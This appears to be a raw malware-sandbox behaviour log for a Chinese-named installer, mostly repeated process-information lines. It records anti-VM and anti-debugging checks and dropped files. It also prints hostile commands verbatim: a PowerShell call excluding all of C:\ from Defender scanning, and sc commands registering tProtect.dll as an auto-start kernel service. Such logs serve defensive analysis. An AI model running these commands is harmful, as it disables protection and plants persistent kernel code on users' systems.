Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6317Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3398Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 643Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 579Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow / User API: threadDelayed 564Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-TAP4G.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE3AEC0 FindFirstFileA,FindClose,FindClose,6_2_6CE3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00466868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00466868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00467496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00467496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00469C60 GetSystemInfo,10_2_00469C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000002.2135843718.000000000158D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CCC3886
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CE50181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004E57D0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE59D66 mov eax, dword ptr fs:[00000030h]6_2_6CE59D66
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE59D35 mov eax, dword ptr fs:[00000030h]6_2_6CE59D35
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE4F17D mov eax, dword ptr fs:[00000030h]6_2_6CE4F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE48CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CE48CBD
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CE50181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF17720 cpuid 6_2_6CF17720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
